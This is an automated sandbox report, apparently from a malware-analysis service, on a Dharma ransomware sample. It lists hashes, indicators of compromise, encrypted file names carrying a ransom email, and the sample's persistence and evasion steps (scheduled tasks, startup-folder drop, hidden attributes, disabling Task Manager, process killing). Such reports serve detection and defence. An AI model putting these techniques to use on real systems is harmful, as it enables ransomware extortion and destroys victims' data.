dharma | 5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

Analysis

max time kernel
274s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
07-05-2023 03:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VirusShare_5c36e305d926e55ef98d392176890cd2.exe
Size

1.0MB
MD5

5c36e305d926e55ef98d392176890cd2
SHA1

64a15cdf89b6c8b85cba355b6944074614d810fd
SHA256

5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512

082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
SSDEEP

24576:EoZZV7Uqi5inyhZQDkUzVDZJ2vH53GaJR38:HOqigyDQDZVq52wM

Score

10^/10

dharma discovery evasion ransomware

Malware Config

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

376 icacls.exe

pid	process
376	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exe

description	ioc	process
File opened (read-only)	\??\N:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\O:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\P:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\R:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\S:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Y:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\H:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\M:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Z:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\K:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\X:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\L:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\A:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\T:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\V:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\I:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\J:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\G:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\B:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\Q:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\U:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\W:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\E:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened (read-only)	\??\F:	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Drops file in Program Files directory 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_pt_BR.properties.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\RenameRedo.ps1.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\ConvertToStart.docx.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jaccess.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\ExpandUnprotect.m3u.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\sa-jdi.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\GRAY.pf.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\UndoSelect.mpeg.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\NOTICE.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\charsets.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\mc.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.cab.cat.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\COPYRIGHT.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\packager.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fi.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File created	C:\Program Files\Java\HRMPRIV	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Common Files\DESIGNER\MSADDNDR.OLB.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\LICENSE.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\accessibility.properties.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
File opened for modification	C:\Program Files\StartImport.ex_.id-49578D27.[decryptioner@uncryptfile.com].HARMA	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4224 schtasks.exe
3108 schtasks.exe
4396 schtasks.exe
3336 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2268 taskkill.exe
3504 taskkill.exe

pid	process
4224	schtasks.exe
3108	schtasks.exe
4396	schtasks.exe
3336	schtasks.exe

pid	process
2268	taskkill.exe
3504	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.exe

pid	process
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 3504 taskkill.exe
Token: SeDebugPrivilege 2268 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	3504	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4892 wrote to memory of 4848	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 4848	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4848 wrote to memory of 4224	4848	cmd.exe	schtasks.exe
PID 4848 wrote to memory of 4224	4848	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 4604	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 4604	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 520	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 520	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 760	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 760	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 760 wrote to memory of 3108	760	cmd.exe	schtasks.exe
PID 760 wrote to memory of 3108	760	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 4648	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 4648	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4648 wrote to memory of 4776	4648	cmd.exe	attrib.exe
PID 4648 wrote to memory of 4776	4648	cmd.exe	attrib.exe
PID 4892 wrote to memory of 3828	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 3828	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 3828 wrote to memory of 4396	3828	cmd.exe	schtasks.exe
PID 3828 wrote to memory of 4396	3828	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 1892	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 1892	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1892 wrote to memory of 3336	1892	cmd.exe	schtasks.exe
PID 1892 wrote to memory of 3336	1892	cmd.exe	schtasks.exe
PID 4892 wrote to memory of 4580	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 4580	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4580 wrote to memory of 2972	4580	cmd.exe	attrib.exe
PID 4580 wrote to memory of 2972	4580	cmd.exe	attrib.exe
PID 4892 wrote to memory of 4596	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 4596	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4596 wrote to memory of 1316	4596	cmd.exe	attrib.exe
PID 4596 wrote to memory of 1316	4596	cmd.exe	attrib.exe
PID 4892 wrote to memory of 948	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 948	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 5044	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 5044	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 948 wrote to memory of 4660	948	cmd.exe	cmd.exe
PID 948 wrote to memory of 4660	948	cmd.exe	cmd.exe
PID 4892 wrote to memory of 432	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 432	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 432 wrote to memory of 2576	432	cmd.exe	cmd.exe
PID 432 wrote to memory of 2576	432	cmd.exe	cmd.exe
PID 4660 wrote to memory of 376	4660	cmd.exe	icacls.exe
PID 4660 wrote to memory of 376	4660	cmd.exe	icacls.exe
PID 5044 wrote to memory of 1632	5044	cmd.exe	reg.exe
PID 5044 wrote to memory of 1632	5044	cmd.exe	reg.exe
PID 4892 wrote to memory of 2044	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 2044	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 2504	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 2504	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 1900	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 1900	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2576 wrote to memory of 2268	2576	cmd.exe	taskkill.exe
PID 2576 wrote to memory of 2268	2576	cmd.exe	taskkill.exe
PID 432 wrote to memory of 3504	432	cmd.exe	taskkill.exe
PID 432 wrote to memory of 3504	432	cmd.exe	taskkill.exe
PID 4892 wrote to memory of 2488	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 2488	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 1556	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 1556	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 812	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 4892 wrote to memory of 812	4892	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 812 wrote to memory of 4376	812	cmd.exe	reg.exe
PID 812 wrote to memory of 4376	812	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

4776 attrib.exe
2972 attrib.exe
1316 attrib.exe

pid	process
4776	attrib.exe
2972	attrib.exe
1316	attrib.exe

